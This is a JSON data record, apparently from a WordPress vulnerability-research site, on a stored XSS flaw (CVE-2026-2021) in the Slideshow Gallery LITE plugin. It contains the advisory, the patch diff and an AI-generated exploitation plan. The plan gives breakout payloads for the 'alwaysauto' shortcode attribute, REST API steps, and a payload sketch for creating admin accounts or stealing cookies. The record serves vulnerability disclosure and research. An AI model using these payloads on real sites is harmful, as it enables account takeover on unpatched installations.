[{"data":1,"prerenderedAt":-1},["ShallowReactive",2],{"$fRBPtrqzwnUpBLfDR1OXtbQqHaqLZ7eLaHyQ8VWklLBg":3},{"id":4,"url_slug":5,"title":6,"description":7,"plugin_slug":8,"theme_slug":9,"affected_versions":10,"patched_in_version":11,"severity":12,"cvss_score":13,"cvss_vector":14,"vuln_type":15,"published_date":16,"updated_date":17,"references":18,"days_to_patch":20,"patch_diff_files":21,"patch_trac_url":9,"research_status":30,"research_verified":31,"research_rounds_completed":32,"research_plan":33,"research_summary":34,"research_vulnerable_code":35,"research_fix_diff":36,"research_exploit_outline":37,"research_model_used":38,"research_started_at":39,"research_completed_at":40,"research_error":9,"poc_status":9,"poc_video_id":9,"poc_summary":9,"poc_steps":9,"poc_tested_at":9,"poc_wp_version":9,"poc_php_version":9,"poc_playwright_script":9,"poc_exploit_code":9,"poc_has_trace":31,"poc_model_used":9,"poc_verification_depth":9,"poc_exploit_code_gated":31,"source_links":41},"CVE-2026-2021","slideshow-gallery-lite-authenticated-contributor-stored-cross-site-scripting-via-alwaysauto-shortcode-attribute","Slideshow Gallery LITE \u003C= 1.8.5 - Authenticated (Contributor+) Stored Cross-Site Scripting via 'alwaysauto' Shortcode Attribute","The Slideshow Gallery LITE plugin for WordPress is vulnerable to Stored Cross-Site Scripting via the 'alwaysauto' shortcode attribute in all versions up to, and including, 1.8.5. This is due to insufficient input sanitization and output escaping on user-supplied attributes. This makes it possible for authenticated attackers, with Contributor-level access and above, to inject arbitrary web scripts in pages that will execute whenever a user accesses an injected page.","slideshow-gallery",null,"\u003C=1.8.5","1.8.6","medium",6.4,"CVSS:3.1\u002FAV:N\u002FAC:L\u002FPR:L\u002FUI:N\u002FS:C\u002FC:L\u002FI:L\u002FA:N","Improper Neutralization of Input During Web Page Generation ('Cross-site Scripting')","2026-06-17 20:00:45","2026-06-18 08:31:47",[19],"https:\u002F\u002Fwww.wordfence.com\u002Fthreat-intel\u002Fvulnerabilities\u002Fid\u002F55d842fc-a750-4b59-a1d6-b3bd427dfe79?source=api-prod",1,[22,23,24,25,26,27,28,29],"css\u002Fadmin.css","readme.txt","slideshow-gallery-plugin.php","slideshow-gallery.php","views\u002Fadmin\u002Fgalleries\u002Fsave.php","views\u002Fadmin\u002Fmetaboxes\u002Fsettings-general.php","views\u002Fadmin\u002Fmetaboxes\u002Fsettings-linksimages.php","views\u002Fadmin\u002Fmetaboxes\u002Fsettings-postspages.php","researched",false,3,"# Exploitation Research Plan: CVE-2026-2021 (Slideshow Gallery LITE)\n\n## 1. Vulnerability Summary\nThe **Slideshow Gallery LITE** plugin (versions \u003C= 1.8.5) is vulnerable to **Authenticated Stored Cross-Site Scripting (XSS)**. The vulnerability exists in the handling of the `alwaysauto` attribute within the `[tribulant_slideshow]` (and the alias `[slideshow]`) shortcode. Authenticated users with **Contributor** permissions or higher can inject malicious scripts into the `alwaysauto` attribute. Because this attribute is rendered into the page source without sufficient sanitization or output escaping (likely via `esc_js()` or `esc_attr()`), the script executes in the context of any user viewing the page, including administrators.\n\n## 2. Attack Vector Analysis\n- **Shortcode:** `[tribulant_slideshow]` or `[slideshow]`\n- **Vulnerable Attribute:** `alwaysauto`\n- **Authentication Level:** Contributor+ (capability `edit_posts` is required to create\u002Fedit posts where shortcodes are processed).\n- **Preconditions:** The plugin must be active. A Contributor must be able to create or edit a post\u002Fpage.\n- **Endpoint:** Post creation\u002Fedit endpoint (`\u002Fwp-admin\u002Fpost.php` or `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`).\n\n## 3. Code Flow\n1. **Registration:** In `slideshow-gallery.php`, the shortcode is registered in the `__construct` method:\n   ```php\n   add_shortcode('slideshow', array($this, 'embed')); \n   add_shortcode('tribulant_slideshow', array($this, 'embed'));\n   ```\n2. **Processing:** When a post containing the shortcode is rendered, the `embed()` method in the `SlideshowGallery` class is called.\n3. **Attribute Extraction:** The method uses `shortcode_atts()` to parse user-supplied attributes, including `alwaysauto`.\n4. **Rendering (The Sink):** The `alwaysauto` value is passed into a rendering context (likely a view file or an inline script block). Based on the vulnerability description, it is rendered unsanitized. It is often embedded within a JavaScript configuration object that initializes the gallery, such as:\n   ```javascript\n   var slideshow_options = {\n       \u002F\u002F ...\n       \"alwaysauto\": \"USER_INPUT_HERE\",\n       \u002F\u002F ...\n   };\n   ```\n   If `USER_INPUT_HERE` is not escaped with `esc_js()`, an attacker can break out of the string and execute arbitrary code.\n\n## 4. Nonce Acquisition Strategy\nThis vulnerability is triggered by inserting a shortcode into a post. **No plugin-specific AJAX nonce is required** to exploit this XSS. The attacker only needs the standard WordPress nonces required for post creation\u002Fediting:\n1. **Login** as a Contributor.\n2. **Navigate** to `wp-admin\u002Fpost-new.php`.\n3. **Extract** the `_wpnonce` from the form (for traditional POST) or use the REST API nonce `wp-auth-check` if using the block editor.\n\n*Note: Since the PoC agent can use the block editor or the classic editor, the simplest way is to use the REST API to create a post, which requires the `wp-rest` nonce usually found in `window.wpApiSettings.nonce`.*\n\n## 5. Exploitation Strategy\n### Step 1: Login and Post Creation\nThe goal is to create a post containing the malicious shortcode.\n\n**HTTP Request (REST API - recommended for automation):**\n- **Method:** `POST`\n- **URL:** `\u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`\n- **Headers:** \n    - `Content-Type: application\u002Fjson`\n    - `X-WP-Nonce: [REST_NONCE]`\n- **Payload:**\n    ```json\n    {\n        \"title\": \"XSS Test\",\n        \"content\": \"[tribulant_slideshow alwaysauto='\\\"});alert(document.domain);var+x=({ \\\"test\\\":\\\"']\",\n        \"status\": \"publish\"\n    }\n    ```\n    *Note: If Contributor cannot 'publish', set status to 'pending' and the admin will view it for approval, triggering the XSS.*\n\n### Step 2: Alternative Payload (HTML Attribute Breakout)\nIf the attribute is rendered directly in an HTML tag:\n- **Payload:** `[tribulant_slideshow alwaysauto='\">\u003Cscript>alert(window.origin)\u003C\u002Fscript>']`\n\n### Step 3: Triggering\nNavigate to the URL of the newly created post (or the preview URL if pending) as an Administrator.\n\n## 6. Test Data Setup\n1. **User Creation:** Create a user with the `contributor` role.\n   - `wp user create attacker attacker@example.com --role=contributor --user_pass=password123`\n2. **Plugin Activation:** Ensure `slideshow-gallery` is active.\n   - `wp plugin activate slideshow-gallery`\n\n## 7. Expected Results\n- When viewing the post, the browser should execute the injected JavaScript (e.g., show an alert box with the domain).\n- Looking at the page source, the `alwaysauto` value should appear unescaped, having broken out of its intended context (either a JS string or an HTML attribute).\n\n## 8. Verification Steps\n1. **Manual Inspection:**\n   Use the `browser_navigate` tool to view the post and `browser_eval` to check for a global variable or evidence of execution.\n   ```javascript\n   \u002F\u002F Check if the script executed (if using a marker instead of alert)\n   browser_eval(\"window.xss_executed = true;\")\n   ```\n2. **Source Code Check:**\n   Check the rendered HTML using `http_request` (GET) and search for the payload string.\n   ```bash\n   # Look for the unescaped breakout\n   grep -C 5 \"alwaysauto\" response_body.html\n   ```\n\n## 9. Alternative Approaches\nIf the `alwaysauto` attribute is not rendered in the frontend but in an admin-only view:\n1. Identify if the plugin has an admin \"Manage Slides\" or \"Settings\" page that renders existing shortcodes or gallery previews.\n2. Use a payload designed to exfiltrate the administrator's session cookies or create a new admin user:\n   - **Payload:** `[tribulant_slideshow alwaysauto='\\\"});fetch(\\\"\u002Fwp-admin\u002Fuser-new.php\\\").then(r=>r.text()).then(t=>{\u002F*CSRF logic to create user*\u002F});\u002F\u002F']`","The Slideshow Gallery LITE plugin for WordPress is vulnerable to Authenticated (Contributor+) Stored Cross-Site Scripting via the 'alwaysauto' shortcode attribute. This occurs because the plugin fails to sufficiently sanitize or escape the attribute value before rendering it in a page's source, allowing an attacker to execute arbitrary JavaScript in the context of any user viewing the post.","\u002F\u002F slideshow-gallery.php approx line 560 (v1.8.5)\n\u002F\u002F Inside the attribute processing logic for the [tribulant_slideshow] shortcode\n\nif (!in_array($s['orderby'], ['id', 'date', 'name', 'type', 'created' , 'order' , 'random'], true)) {\n    $s['orderby'] = array('order', \"ASC\"); \u002F\u002F Default fallback\n}\n\n\u002F\u002F Additional validation based on the context\nif (!in_array($s['orderf'], ['id', 'date', 'name', 'type', 'created', 'order'], true)) {\n    $s['orderf'] = 'order'; \u002F\u002F Default fallback\n}","--- \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fslideshow-gallery\u002F1.8.5\u002Fslideshow-gallery.php\t2025-10-29 17:16:02.000000000 +0000\n+++ \u002Fhome\u002Fdeploy\u002Fwp-safety.org\u002Fdata\u002Fplugin-versions\u002Fslideshow-gallery\u002F1.8.6\u002Fslideshow-gallery.php\t2026-06-10 16:16:26.000000000 +0000\n@@ -559,12 +562,17 @@\n \t\t        }\n \t\t    }\n \t\t    \n-            if (!in_array($s['orderby'], ['id', 'date', 'name', 'type', 'created' , 'order' , 'random'], true)) {\n+            if (!in_array($s['orderby'], ['id', 'date', 'name', 'type', 'created' , 'order' , 'random', 'menu_order'], true)) {\n                 $s['orderby'] = array('order', \"ASC\"); \u002F\u002F Default fallback\n             }\n \n+\t\t    \u002F\u002F Validate alwaysauto to only accept 'true' or 'false'\n+\t\t    if (!in_array($s['alwaysauto'], ['true', 'false'], true)) {\n+\t\t        $s['alwaysauto'] = 'true'; \u002F\u002F Default fallback\n+\t\t    }\n+\t\t\n \t\t    \u002F\u002F Additional validation based on the context\n-\t\t    if (!in_array($s['orderf'], ['id', 'date', 'name', 'type', 'created', 'order'], true)) {\n+\t\t    if (!in_array($s['orderf'], ['id', 'date', 'name', 'type', 'created', 'order', 'menu_order'], true)) {\n \t\t        $s['orderf'] = 'order'; \u002F\u002F Default fallback\n \t\t    }","The exploit is executed by an authenticated user with at least 'Contributor' privileges. The attacker creates a new WordPress post and inserts the `[tribulant_slideshow]` shortcode with a malicious payload in the `alwaysauto` attribute. \n\nMethodology:\n1. Authenticate as a Contributor.\n2. Use the Post editor (Classic or Block) or the WordPress REST API (`POST \u002Fwp-json\u002Fwp\u002Fv2\u002Fposts`) to create a post.\n3. The payload involves breaking out of a JavaScript string or HTML attribute context, for example: `[tribulant_slideshow alwaysauto='\"});alert(document.domain);var+x=({ \"test\":\"']`.\n4. When an Administrator views the post (either published or in draft preview), the injected script will execute in their browser context.","gemini-3-flash-preview","2026-06-25 21:34:05","2026-06-25 21:34:58",{"type":42,"vulnerable_version":43,"fixed_version":11,"vulnerable_browse":44,"vulnerable_zip":45,"fixed_browse":46,"fixed_zip":47,"all_tags":48},"plugin","1.8.5","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fslideshow-gallery\u002Ftags\u002F1.8.5","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fslideshow-gallery.1.8.5.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fslideshow-gallery\u002Ftags\u002F1.8.6","https:\u002F\u002Fdownloads.wordpress.org\u002Fplugin\u002Fslideshow-gallery.1.8.6.zip","https:\u002F\u002Fplugins.trac.wordpress.org\u002Fbrowser\u002Fslideshow-gallery\u002Ftags"]